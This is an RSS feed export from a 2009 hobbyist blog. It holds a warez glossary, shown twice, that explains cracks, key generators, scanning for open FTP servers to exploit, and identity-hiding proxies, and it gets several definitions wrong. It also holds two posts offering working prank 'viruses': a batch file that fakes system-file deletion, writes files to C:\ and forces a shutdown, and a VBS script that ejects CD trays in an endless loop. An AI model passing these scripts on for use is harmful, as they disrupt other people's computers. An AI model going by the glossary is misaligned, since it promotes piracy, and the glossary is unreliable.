/&gt;&lt;br /&gt;Voting - Members of the warez scene are very keen to reach the number one slot of top lists such as Voodoo, Top 60 etc. and will therefore encourage you to vote for their site to improve their position and get the credit they deserve (or not as the case may be!).&lt;br /&gt;&lt;br /&gt;Warez - "Pirated" Full version software that is uploaded to the internet and is available for free download.&lt;br /&gt;&lt;br /&gt;Warez Board - Bulletin board used by the warez community to share links and discuss anything related to warez.&lt;br /&gt;&lt;br /&gt;Winace - Another utility used for decompressing all the common archive formats. Not great in my opinion. See below for a better one.&lt;br /&gt;&lt;br /&gt;Wingate - Similar to a proxy in that they are used to hide your identity, except all information actually passes through the Wingate, if you have a slow Wingate you get slow download/upload speeds. Wingates are also used to force FXP transfer on pubs that do not normally accept FXP, again all data passes through the Wingate so you need one that is fast for it to be useful.&lt;br /&gt;&lt;br /&gt;Winrar - Utility used for decompressing .rar files and much more.&lt;br /&gt;&lt;br /&gt;Winzip - An essential tool used to decompress warez files.&lt;br /&gt;&lt;br /&gt;Zip - A common compression format used to store warez.</description><link>http://zts-zts.blogspot.com/2009/08/warez-definitons.html</link><author>noreply@blogger.com (Sharath)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3740830892798425044.post-591849942488534532</guid><pubDate>Mon, 10 Aug 2009 17:04:00 +0000</pubDate><atom:updated>2009-08-10T10:05:17.394-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Hacking</category><title>Warez Definitions</title><description>ISO:&lt;br /&gt;A file that is created from an image of a CD. You can make an iso yourself with a program such as Adaptec Easy CD Creator, or you can burn an ISO file to a CD-R to create a copy of a CD.&lt;br /&gt;&lt;br /&gt;Bin/cue files:&lt;br /&gt;These are also used to create an image of a CD. Most people burn these with CdrWin or Fireburner. The .bin file contains all the data for the cd, the .cue file is just a small file in text format telling the software exactly how to burn the data onto the CD.&lt;br /&gt;&lt;br /&gt;MP3:&lt;br /&gt;Don't know what these are? What cave have you been you living in? This is a format used to compress music files. You can create your own by encoding .wav files ripped from audio CDs. There are many free players that will play mp3s for you (see the Winamp tutorial)&lt;br /&gt;&lt;br /&gt;Ace files:&lt;br /&gt;These are used to compress/archive data. Use WinAce to decompress them, or to make your own. The normal format for ace files is to have .ace, .c01, .c01, etc.&lt;br /&gt;&lt;br /&gt;Rar files:&lt;br /&gt;Another compression/archive format. This is most commonly used on iso or bin files in order to split them up into smaller files (15 MB is the norm). Winrar and many other utilities can decompress these. Rar files are usually in the format .rar, .r01, .r02, etc. But don't be surprised if you don't see a .rar file. Just open up winrar and point it to .r01. You also may see them packed as .001, .002, etc. (maybe with a .rar, maybe not)&lt;br /&gt;&lt;br /&gt;Pub:&lt;br /&gt;This is an FTP that has left on anonymous access. Many are owned by large companies, so they have a lot of bandwidth. This makes it possible for one person to send files there and many people can download them at once =) These are found by scanning ranges of ips (see the FTP tutorial). Just remember, like the name says, these are public. Just because you upload something there or make directories with your name does not make it 'your pub'. At the same time, realize that if you come across a pub with another person/groups stuff on it that it may be in use to build other pubs from - so don't ruin it for many people by deleting stuff you find there. For more on this, go read some posts on our Bulletin Board.&lt;br /&gt;&lt;br /&gt;Proxy:&lt;br /&gt;A system that is set up to forward packets... There are many different kinds, check out the proxy tutorial for more info. Basically, a proxy server helps cover up your tracks because you connect to remote computers through the proxy. Think of it as the condom of the Internet&lt;br /&gt;&lt;br /&gt;SFV Files/ CRC Checks:&lt;br /&gt;SFV files contain information about files that they accompany. You can preform a CRC check on the files using a program such as WinSFV. This compares the information in the SFV file to the file itself. If the information doesn't match, then the file was probably messed up in transfer somehow.. try downloading it again, from a different source if possible.&lt;br /&gt;&lt;br /&gt;0-Day:&lt;br /&gt;Latest software releases.&lt;br /&gt;&lt;br /&gt;0-Sec:&lt;br /&gt;Same as above, although the period of time between ripping a game or application and it appearing on a warez site is even shorter.&lt;br /&gt;&lt;br /&gt;Ace File:&lt;br /&gt;The first file in a series of compressed archives (the one you double click on to decompress all the files at once).&lt;br /&gt;&lt;br /&gt;Active List:&lt;br /&gt;Similar to a mailing list, but uses ICQ to send instant messages to subscribers.&lt;br /&gt;&lt;br /&gt;Alpha:&lt;br /&gt;Software receives this label when it is in the very early stages of development. Usually full of bugs, so don't touch it with a barge pole.&lt;br /&gt;&lt;br /&gt;Anti-Leech:&lt;br /&gt;A system which uses cgi scripts to prevent people stealing links and then taking the credit for uploading the files.&lt;br /&gt;&lt;br /&gt;Appz:&lt;br /&gt;Short for applications. For example Flash 5 or GoLie 5.5.&lt;br /&gt;&lt;br /&gt;ASF File:&lt;br /&gt;The worst quality movie file format (still pretty good though), much smaller in size than dat or mpg.&lt;br /&gt;&lt;br /&gt;Banner Site:&lt;br /&gt;Password and username restricted FTP site. To get the correct login details you must click on several banners.&lt;br /&gt;&lt;br /&gt;Beta:&lt;br /&gt;An acronym for Business Software Alliance, an organisation who are responsible for enforcing anti-piracy litigation. Similar groups in charge of controlling software "theft" include the SIIA, SPA and ELSPA.&lt;br /&gt;&lt;br /&gt;BSOD:&lt;br /&gt;Many people read about BSODs on bulletin boards and think that they're being insulted, but there is no need to get paranoid. It is actually an acronym for "Blue Screen Of Death". These can occur for a multitude of reasons (old Bill likes to keep us guessing!) and are the bane of PC user's lives.&lt;br /&gt;&lt;br /&gt;Bulletin Board:&lt;br /&gt;A virtual meeting place on the web similar to a chat room except that it isn't in real time. One person leaves a message then others come along, read it and add a reply. Each new discussion is called a new topic or thread and has it's own link. Whenever a new topic is created the older topics are pushed one place downwards in the list. When someone replies to an older topic it is brought back to the top of the list.&lt;br /&gt;&lt;br /&gt;C?? File:&lt;br /&gt;File extension that indicates that a file is part of an .ace or .rar series of compressed files.&lt;br /&gt;&lt;br /&gt;Cgi Scripts:&lt;br /&gt;These are referrers which are used in url’s. When you click on a link with a ?cgi reference you are directed to a sponsor’s website or an anti-leech protected file.&lt;br /&gt;&lt;br /&gt;Cookie:&lt;br /&gt;A tiny text file (usually less than 1kb), which is stored on your hard drive when you visit a web site. These are used to remember who you are so that you can access members only areas on the site without having to type in a password every time or to retain your personalised settings so that they are available the next time you visit.&lt;br /&gt;&lt;br /&gt;Courier:&lt;br /&gt;Someone who is involved in the logistics of delivering new releases directly from the release groups themselves to FTP sites.&lt;br /&gt;&lt;br /&gt;Crack:&lt;br /&gt;A tiny executable file that is used to transform a shareware program into the full version. Also used to remove any copy protection from the main executable of games (this will already have been done in "ripped" warez games).&lt;br /&gt;&lt;br /&gt;CRC Error:&lt;br /&gt;These can occur when you try to decompress a file that has become corrupt during the downloading process, usually as a result of too much resuming.&lt;br /&gt;&lt;br /&gt;Credits:&lt;br /&gt;The amount of data you are permitted to download from a ratio site. The more credits you have the more software you are allowed to download.&lt;br /&gt;&lt;br /&gt;DAP:&lt;br /&gt;A quick way of referring to "Download Accelerator Plus", a free download manager that claims to speed up file transfers by up to three hundred per cent. It works by making multiple connections to the same file and is paid for by revolving advertising banners.Also supports resume. **EDITOR'S PICK**&lt;br /&gt;&lt;br /&gt;DAT File:&lt;br /&gt;File format used for movies, identical in quality and size to mpg as far as I can tell.&lt;br /&gt;&lt;br /&gt;DC:&lt;br /&gt;The lazy way of referring to the Dreamcast, Sega's latest console incarnation.&lt;br /&gt;&lt;br /&gt;Decompression:&lt;br /&gt;Unpacking many files that have been stored in a single archive.&lt;br /&gt;&lt;br /&gt;Distro:&lt;br /&gt;A concise means of referring to a distribution FTP site. These are huge storage areas which act as a springboard for the transfer of new releases. Their whereabouts are never public disclosed to aid their survival rate. You can think of them as the initial source from which warez emanates.&lt;br /&gt;&lt;br /&gt;Direct Downloads&lt;br /&gt;Links to actual files rather than other warez sites or pages. These are usually gathered together from many different sites and put on one page for your convenience.&lt;br /&gt;&lt;br /&gt;DivX:&lt;br /&gt;Movies ripped from a DVD using the DivX video codecs. Can be played back using Media Player.&lt;br /&gt;&lt;br /&gt;DIZ File:&lt;br /&gt;Short for description. Very brief text file found in warez archives stating the title of the software, the number of files that makes up the set and the group who released it.&lt;br /&gt;&lt;br /&gt;Download (or DL):&lt;br /&gt;Copying files from a web server or FTP site to your computer using a modem.&lt;br /&gt;&lt;br /&gt;Emulator:&lt;br /&gt;An application that simulates another computer system or console using your PC.&lt;br /&gt;&lt;br /&gt;FAQ:&lt;br /&gt;Stands for Frequently Asked Questions.&lt;br /&gt;&lt;br /&gt;FAW:&lt;br /&gt;Abbreviation for "Files Anywhere", a popular, free web storage service.&lt;br /&gt;&lt;br /&gt;File Transfer Protocol (FTP):&lt;br /&gt;The method used to transfer files from one computer to another using a modem.&lt;br /&gt;&lt;br /&gt;Flaming:&lt;br /&gt;A general net term for "verbally" attacking someone. This can be done via email, bulletin board, chat room or any medium which involves communication across the web.&lt;br /&gt;&lt;br /&gt;Freedrive:&lt;br /&gt;Virtual hard drive storage area on the web. Free to join and anything and everything can be uploaded or downloaded.&lt;br /&gt;&lt;br /&gt;Freeware:&lt;br /&gt;Unrestricted software that is downloaded from the net and is completely free to use. Often paid for using advertising.&lt;br /&gt;&lt;br /&gt;FTP Client / Browser:&lt;br /&gt;A program used to access, upload and download data from FTP sites.&lt;br /&gt;&lt;br /&gt;Fxp:&lt;br /&gt;The art of transferring data from one Ftp site to another using the connection speed of the slower of the two computers.&lt;br /&gt;&lt;br /&gt;Gamez:&lt;br /&gt;Pretty self-explanatory this one.&lt;br /&gt;&lt;br /&gt;Getright:&lt;br /&gt;One of the best download managers available.&lt;br /&gt;&lt;br /&gt;Gold:&lt;br /&gt;A piece of software is said to have gone gold when the final version is complete and it is ready to ship to the public.&lt;br /&gt;&lt;br /&gt;Gozilla:&lt;br /&gt;Another excellent download manager.&lt;br /&gt;&lt;br /&gt;Hacking:&lt;br /&gt;Gaining access to a remote computer without the authorisation to do so. Usually for the purposes of stealing confidential information or the malicious destruction of data.&lt;br /&gt;&lt;br /&gt;Hammering:&lt;br /&gt;Repeatedly trying to access an FTP site using an FTP client or download manager.&lt;br /&gt;&lt;br /&gt;HTTP:&lt;br /&gt;Stands for "Hypertext Transfer Protocol". The method you use to view a web page. Always comes before the address of a website in your Url bar.&lt;br /&gt;&lt;br /&gt;ICQ:&lt;br /&gt;Derives from the term "I Seek You" and is used for real time chat and transferring files over the internet.&lt;br /&gt;&lt;br /&gt;IP Address:&lt;br /&gt;A series of numbers separated by dots used to identify your computer on the Internet.&lt;br /&gt;&lt;br /&gt;IRC:&lt;br /&gt;Stands for "Instant Relay Chat". Used for real time chat and transferring files over the Internet.&lt;br /&gt;&lt;br /&gt;ISO:&lt;br /&gt;An exact copy of an original CD, all the multimedia bits and pieces are uncut and therefore they are extremely large and awkward to download.&lt;br /&gt;&lt;br /&gt;Java:&lt;br /&gt;Html scripts used to add functionality to or bring web pages alive. These include animation (such as the title graphic on my main page), menus, chat rooms, buttons, pop ups and so on.&lt;br /&gt;&lt;br /&gt;Key Generator:&lt;br /&gt;A tiny executable program that is capable of creating a serial number from a specified username. These are specific to particular applications or utilities, so a serial number created with one key generator will only work for the program for which the key generator was developed.&lt;br /&gt;&lt;br /&gt;Lamer:&lt;br /&gt;An annoying and overused general derogatory term used to insult/put down anyone and everything.&lt;br /&gt;&lt;br /&gt;Leeching:&lt;br /&gt;Downloading files without giving anything back in return or copying other people’s links.&lt;br /&gt;&lt;br /&gt;Mirror:&lt;br /&gt;An exact copy of a web site that is stored on a different server. Using multiple locations for warez sites allows the site to be accessed using a different address if the main site is deleted.&lt;br /&gt;&lt;br /&gt;Modchip:&lt;br /&gt;Very common website sponsor found on warez sites. They don’t mind their banners being used on illegal software sites because their products are one of the “grey areas” of the law. Modchips are small pieces of electronic circuitry which allow copied games to be played on your Playstation. If a Playstation has been fitted with a Modchip it is said to have been "chipped".&lt;br /&gt;&lt;br /&gt;MP3 File:&lt;br /&gt;Compressed music file format. Average track size is between 3 and 4 meg compared to 40-ish meg in wav format.&lt;br /&gt;&lt;br /&gt;MPG File:&lt;br /&gt;The best quality and largest movie file format.&lt;br /&gt;&lt;br /&gt;Multi Web Space Faker:&lt;br /&gt;A tool used to create lots of free web space accounts simultaneously.&lt;br /&gt;&lt;br /&gt;Name Zero:&lt;br /&gt;An organisation that offers free website domain names. The main drawbacks are that you have to put up with a very bulky banner residing at the bottom of your page and the fact that you never actually own your chosen address.&lt;br /&gt;&lt;br /&gt;NFO File:&lt;br /&gt;Short for info or information. Basic text file containing all the important details relating to a particular release, such as number of files, release date, copy protection system, installation instructions etc.&lt;br /&gt;&lt;br /&gt;Nuked:&lt;br /&gt;A release is said to be nuked if it is completely unplayable. Usually when this happens another group re-releases the particular game, although fixes do sometimes follow on to rescue the game from trash can.&lt;br /&gt;&lt;br /&gt;OEM:&lt;br /&gt;An acronym for Original Equipment Manufacturer. OEM software products are repackaged versions of the full retail product. They are often re-branded to suit the needs of the particular vender and are much more reasonable priced because they lack excessive packaging and a hard copy of the manual.&lt;br /&gt;&lt;br /&gt;OST:&lt;br /&gt;Not strictly a warez term this one, but one that you are likely to come across while searching for MP3 music. It stands for original soundtrack (movie music).&lt;br /&gt;&lt;br /&gt;Patch:&lt;br /&gt;We all know games and applications aren't perfect. When they are released we would hope that they have been thoroughly tested for bugs and incompatibility problems, but you can guarantee that many of these will still slip through the quality control net. Once the program is released to the general public, the bug reports start to flood in. A patch is a downloadable executive file which takes these reports into account and attempts to incorporate all the fixes for these known problems. A patch can resolve incompatibility problems, prevent crashes or improve the performance of a piece of software.&lt;br /&gt;&lt;br /&gt;Piracy:&lt;br /&gt;The replication and distribution of videos or computer software.&lt;br /&gt;&lt;br /&gt;Pop-ups:&lt;br /&gt;Irritating browser windows that open automatically when you visit a warez site. Usually contain voting portals or porn sites.&lt;br /&gt;&lt;br /&gt;Port:&lt;br /&gt;A port is a term used when referring to FTP sites and is an essential extension of the address used to access them. If the port number of an FTP site isn't specified the default setting of 21 will automatically be used.&lt;br /&gt;&lt;br /&gt;Pron:&lt;br /&gt;A long time ago in a galaxy far, far away someone posted a request for porn on a bulletin board, only, because of a typing error what he ended up asking for was "pron". Since then this has become a bit of a running joke and so it is now deliberately misspelled.&lt;br /&gt;&lt;br /&gt;Proxy:&lt;br /&gt;A third party server which acts as an anonymous go between whenever you request a web page or contact a remote server. The message from your computer is first sent through the proxy server before being relayed to the final destination so that it appears as though the request has come from the IP address of the proxy server rather than you. Used when you wish to maintain your privacy on the net or speed up your connection (much more detailed info on this subject in the "more tips" section).&lt;br /&gt;&lt;br /&gt;Psx:&lt;br /&gt;A quick way of referring to the Sony Playstation.&lt;br /&gt;&lt;br /&gt;Pub:&lt;br /&gt;A free for all FTP site where anonymous access is permitted.&lt;br /&gt;&lt;br /&gt;Pub Scanner:&lt;br /&gt;Someone who scours the net for anonymous access FTP sites which permit the creation and deletion of files. These are then exploited by uploading software for others to share.&lt;br /&gt;&lt;br /&gt;Pub Stealer:&lt;br /&gt;Someone who posts the IP address of a public FTP site which they themselves have not built. Some pub stealers justify this by claiming that the elitism of private FXP groups discriminates against those people who do not have access, yet others simply post other people's work to try to claim the credit for themselves. Either way though, pub stealers are despised by the FXP groups and praised by those who would otherwise not have access to them.&lt;br /&gt;&lt;br /&gt;Rar File:&lt;br /&gt;The first file in a series of compressed archives (the one you double click on to decompress all the files at once). Usually decompressed using a program called Winrar.&lt;br /&gt;&lt;br /&gt;Release Groups:&lt;br /&gt;A group of people who are involved in cracking and / or ripping software and then repackaging it into easily downloadable segments.&lt;br /&gt;&lt;br /&gt;Ratio:&lt;br /&gt;Two numbers separated by a semi-colon. Indicates how much data you must upload to an FTP site before you are permitted to download anything.&lt;br /&gt;&lt;br /&gt;Reg File:&lt;br /&gt;Tiny file that adds essential configuration details into the registry.&lt;br /&gt;&lt;br /&gt;Resume:&lt;br /&gt;The ability to stop and start downloading / uploading a file whenever you choose without having to start from the beginning again.&lt;br /&gt;&lt;br /&gt;Rip:&lt;br /&gt;Software that has had all the non-essential gubbins removed to reduce its size. Videos and music are always the first casualties.&lt;br /&gt;&lt;br /&gt;Raped:&lt;br /&gt;A release is branded with this term if it has been damaged beyond repair during the ripping process.&lt;br /&gt;&lt;br /&gt;RM File:&lt;br /&gt;Shorthand for Real Media, a file format used to encode video sequences, which can only be played back using the "Real Player". Video clips produced using this format are not of the highest quality, but do have the advantage of a small file size.&lt;br /&gt;&lt;br /&gt;ROM:&lt;br /&gt;Games which are designed for other platforms, but are played on the PC using an emulator.&lt;br /&gt;&lt;br /&gt;Serial:&lt;br /&gt;A valid username and password that is saved as a basic text file and is used to register a shareware program and therefore remove all the restrictions.&lt;br /&gt;&lt;br /&gt;Shareware:&lt;br /&gt;Try before you buy software downloaded from the net.&lt;br /&gt;&lt;br /&gt;Spam:&lt;br /&gt;Unsolicited junk e-mail. Supposedly stands for "Stupid Person's Annoying Message".&lt;br /&gt;&lt;br /&gt;Sponsor:&lt;br /&gt;To make some money webmasters can place adverts on their sites. Each time you click on these adverts or banners they get paid a few cents for bringing potential customers to the sponsors website.&lt;br /&gt;&lt;br /&gt;Surfer Friendly (SF):&lt;br /&gt;Surfer friendly sites supposedly have no blind links, pop-ups or porn banners. Don't be fooled by this label though as some sites will tell you fibs to get you to visit them.&lt;br /&gt;&lt;br /&gt;Sys Op:&lt;br /&gt;The person who has the responsibility for running the computer from which an FTP site has been established. When warez is uploaded to public FTP sites and then suddenly goes "Missing In Action" you can often lay the blame at the door of the Sys Op who has an obligation to make sure his/her server stays within the boundaries of the law (i.e. warez free).&lt;br /&gt;&lt;br /&gt;Top List:&lt;br /&gt;Chart which lists in rank order the best warez sites. Worked out on the basis of votes.&lt;br /&gt;&lt;br /&gt;Trading:&lt;br /&gt;Swapping warez, file for file via FTP, ICQ etc. Not usually approved of by the real warez community who believe that warez should be freely distributed. To put it simply, it is not the "warez way".&lt;br /&gt;&lt;br /&gt;Trainer:&lt;br /&gt;A small, executable program which sits in your taskbar while you play a game. Hotkeys are associated with cheat commands so that when they are pressed you are given extra ammo, weapons, lives or the ability to toggle between invincible/mortal modes etc etc.&lt;br /&gt;&lt;br /&gt;Trojans:&lt;br /&gt;Nasty virus like attachments which can be merged with executable files. These are tiny so are unlikely to arouse suspicion. When run they allow a hacker to access your computer and wreak havoc. Can occasionally be found in warez files.&lt;br /&gt;&lt;br /&gt;UBB:&lt;br /&gt;Shorthand for Ultimate Bulletin Board, currently the most popular script used for creating warez bulletin boards.&lt;br /&gt;&lt;br /&gt;UBB Hacks:&lt;br /&gt;This term falsely gives the impression that something destructive or malicious is involved, but when you hear people talking about a hack in the context of bulletin boards they are simply referring to code which helps to improve the functionality of a board. For example a "thread hack" would effect the way in which individual threads look and operate.&lt;br /&gt;&lt;br /&gt;Undeletable Pub:&lt;br /&gt;An anonymous access, public FTP site where the permission attributes are set to allow uploads and downloads, but do not permit deletion.&lt;br /&gt;&lt;br /&gt;Unzip:&lt;br /&gt;Unpacking or decompressing many files that have been stored in a single archive. Technically only used when talking about zip files.&lt;br /&gt;&lt;br /&gt;Upload:&lt;br /&gt;Copying files from your computer to a web server or FTP site using a modem.&lt;br /&gt;&lt;br /&gt;URL:&lt;br /&gt;Stands for "Uniform Resource Locator". The web site address you type into your browser.&lt;br /&gt;&lt;br /&gt;Voting:&lt;br /&gt;Members of the warez scene are very keen to reach the number one slot of top lists such as Voodoo, Top 60 etc. and will therefore encourage you to vote for their site to improve their position and get the credit they deserve (or not as the case may be!).&lt;br /&gt;Warez:&lt;br /&gt;Full version software that is uploaded to the internet and is available for free download.&lt;br /&gt;&lt;br /&gt;Warez Board:&lt;br /&gt;Bulletin board used by the warez community to share links and discuss anything related to warez.&lt;br /&gt;&lt;br /&gt;Winace:&lt;br /&gt;Another utility used for decompressing all the common archive formats. Not great in my opinion. See below for a better one.&lt;br /&gt;&lt;br /&gt;Winrar:&lt;br /&gt;Utility used for decompressing .rar files and much more.&lt;br /&gt;&lt;br /&gt;Winzip:&lt;br /&gt;An essential tool used to decompress warez files.&lt;br /&gt;&lt;br /&gt;Zip:&lt;br /&gt;A common compression format used to store warez .</description><link>http://zts-zts.blogspot.com/2009/08/warez-definitions.html</link><author>noreply@blogger.com (Sharath)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3740830892798425044.post-6621969990463630975</guid><pubDate>Fri, 12 Jun 2009 15:06:00 +0000</pubDate><atom:updated>2009-06-12T08:06:58.944-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">virus</category><title>comp suscide virus</title><description>your computer has commited suicide.
&lt;br /&gt;write following these lines in notepad n save it .bat file .....n run it....
&lt;br /&gt;now see the fun
&lt;br /&gt;cls
&lt;br /&gt;:A
&lt;br /&gt;color 0a
&lt;br /&gt;cls
&lt;br /&gt;@echo off
&lt;br /&gt;echo Wscript.Sleep 5000&gt;C:\sleep5000.vbs
&lt;br /&gt;echo Wscript.Sleep 3000&gt;C:\sleep3000.vbs
&lt;br /&gt;echo Wscript.Sleep 4000&gt;C:\sleep4000.vbs
&lt;br /&gt;echo Wscript.Sleep 2000&gt;C:\sleep2000.vbs
&lt;br /&gt;cd %systemroot%\System32
&lt;br /&gt;dir
&lt;br /&gt;cls
&lt;br /&gt;start /w wscript.exe C:\sleep3000.vbs
&lt;br /&gt;echo Deleting Critical System Files...
&lt;br /&gt;echo del *.*
&lt;br /&gt;start /w wscript.exe C:\sleep3000.vbs
&lt;br /&gt;echo Deletion Successful!&lt;brstart /w wscript.exe C:\sleep2000.vbs
&lt;br /&gt;echo:
&lt;br /&gt;echo:
&lt;br /&gt;echo:
&lt;br /&gt;echo Deleting Root Partition...
&lt;br /&gt;start /w wscript.exe C:\sleep2000.vbs
&lt;br /&gt;echo del %SYSTEMROOT%
&lt;br /&gt;start /w wscript.exe C:\sleep4000.vbs
&lt;br /&gt;echo Deletion Successful!
&lt;br /&gt;start /w wscript.exe C:\sleep2000.vbs
&lt;br /&gt;echo:
&lt;br /&gt;echo:
&lt;br /&gt;echo:
&lt;br /&gt;echo Creating Directory h4x...
&lt;br /&gt;cd C:\Documents and Settings\All Users\Start Menu\Programs\
&lt;br /&gt;mkdir h4x
&lt;br /&gt;start /w wscript.exe C:\sleep3000.vbs
&lt;br /&gt;echo Directory Creation Successful!
&lt;br /&gt;echo:
&lt;br /&gt;echo:
&lt;br /&gt;echo:
&lt;br /&gt;echo Execution Attempt 1...
&lt;br /&gt;start /w wscript.exe C:\sleep3000.vbs
&lt;br /&gt;echo cd C:\Documents and Settings\All Users\Start Menu\Programs\Startup\h4x\
&lt;br /&gt;echo start hax.exe
&lt;br /&gt;start /w wscript.exe C:\sleep3000.vbs
&lt;br /&gt;echo Virus Executed!
&lt;br /&gt;echo:
&lt;br /&gt;echo:
&lt;br /&gt;echo:
&lt;br /&gt;start /w wscript.exe C:\sleep2000.vbs
&lt;br /&gt;echo Disabling Windows Firewall...
&lt;br /&gt;start /w wscript.exe C:\sleep2000.vbs
&lt;br /&gt;echo Killing all processes...
&lt;br /&gt;start /w wscript.exe C:\sleep2000.vbs
&lt;br /&gt;echo Allowing virus to boot from startup...
&lt;br /&gt;start /w wscript.exe C:\sleep2000.vbs
&lt;br /&gt;echo:
&lt;br /&gt;echo:
&lt;br /&gt;echo Virus has been executed successfully!
&lt;br /&gt;start /w wscript.exe C:\sleep2000.vbs
&lt;br /&gt;echo:
&lt;br /&gt;echo Have fun!
&lt;br /&gt;start /w wscript.exe C:\sleep2000.vbs
&lt;br /&gt;pause
&lt;br /&gt;shutdown -f -s -c "Your computer has committed suicide. Have a nice day." </description><link>http://zts-zts.blogspot.com/2009/06/comp-suscide-virus.html</link><author>noreply@blogger.com (Sharath)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-3740830892798425044.post-8087540176048381556</guid><pubDate>Fri, 12 Jun 2009 15:05:00 +0000</pubDate><atom:updated>2009-06-12T08:05:59.992-07:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">virus</category><title>cd-rom open virus</title><description>// Save the file with .vbs extension&lt;br /&gt;&lt;br /&gt;Set oWMP = CreateObject("WMPlayer.OCX.7" )&lt;br /&gt;Set colCDROMs = oWMP.cdromCollection&lt;br /&gt;if colCDROMs.Count &gt;= 1 then&lt;br /&gt;do&lt;br /&gt;For i = 0 to colCDROMs.Count - 1&lt;br /&gt;colCDROMs.Item(i).Eject&lt;br /&gt;Next ' cdrom&lt;br /&gt;For i = 0 to colCDROMs.Count - 1&lt;br /&gt;colCDROMs.Item(i).Eject&lt;br /&gt;Next ' cdrom&lt;br /&gt;loop&lt;br /&gt;End If</description><link>http://zts-zts.blogspot.com/2009/06/cd-rom-open-virus.html</link><author>noreply@blogger.com (Sharath)</author><thr:total>0</thr:total></item></channel></rss>